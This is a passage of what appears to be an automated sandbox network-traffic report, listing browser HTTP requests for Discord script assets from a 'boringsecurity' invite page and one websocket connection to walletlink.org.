__cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/26737.36ed5a81390b304d18a5.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/48449.255f5bbd30481bc03d50.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Oj2WPjrxAPrNGTRJmGRQ0jfyfob_UqLvi5IrF7Qyx1o-1702226716526-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/81161.abe9578e4d66ca1934cd.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=UAbhRsmaZWARet7AlYcqNYX1MndAdyXs_47d49tl628-1702226716836-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/27043.105ce50242094adf158e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=UAbhRsmaZWARet7AlYcqNYX1MndAdyXs_47d49tl628-1702226716836-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/72243.fd97ea76672332fed74e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=WN0zY43OmwmVkJPdXCJV_wahinCz6CLk4SAfMDDtZHg-1702226716986-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/47498.38da6b2cf2f487359536.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/48059.c41375af349f67f19d42.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/43820.2dfe02f35ae2675fa737.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/6086.1339c227c38e3c5b2586.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/64612.26d2bf1afbde26a43a76.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=_6GQ8QtUHu8.oOBijCt_kR_eqXbr1NCSfOnBsOJXNW8-1702226717582-0-604800000
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: AkcZ3OPZR2qFCx6KlgEwAA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /assets/18409.cf59ec1aee18034022a9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/5593.7ea5e2c9f604c23670f3.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/55348.29e83ba0718684f2c9af.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/70941.610eda6b5366c83284d8.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/62597.1768a5537a0db3f9e8ac.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=o2aDdI7qMt.17pfQ.IoNv.Z4CwoJ.ZSrEKqn0S73gy0-1702226718128-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/53509.d075f1bff85f12b95485.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=o2aDdI7qMt.17pfQ.IoNv.Z4CwoJ.ZSrEKqn0S73gy0-1702226718128-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/74783.f757e19ccddf8f692dc9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ooZGhTfw6Uh_zbbx7_K1mJVB4VRrOd2YJcPHqWLx4oI-1702226718440-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/59459.805f1d37a012735e4e89.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NtVlIpD02s2867zysSi1z_tayCu1R0dio23.m.ONvKQ-1702226718645-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/53526.ad1fa7caed5e70d3ddc2.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NtVlIpD02s2867zysSi1z_tayCu1R0dio23.m.ONvKQ-1702226718645-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/7273.c6fee0df510188855fd0.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/65800.657a577c4f6fc39eb27e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/66318.3e13ea80eda74e3ed337.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/webMinimal.be9c931086cfd9898b0f.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/sentry.14a93a5009fad9a88b94.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=yGTmYPp_hqj1hDyRzyJ50GPMN3nfg__GZhDiRBd5Tlw-1702226719273-0-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Context-Properties: eyJsb2NhdGlvbiI6IkFjY2VwdCBJbnZpdGUgUGFnZSJ9X-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: Europe/ZurichX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/8e64227ebe6f34850334.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
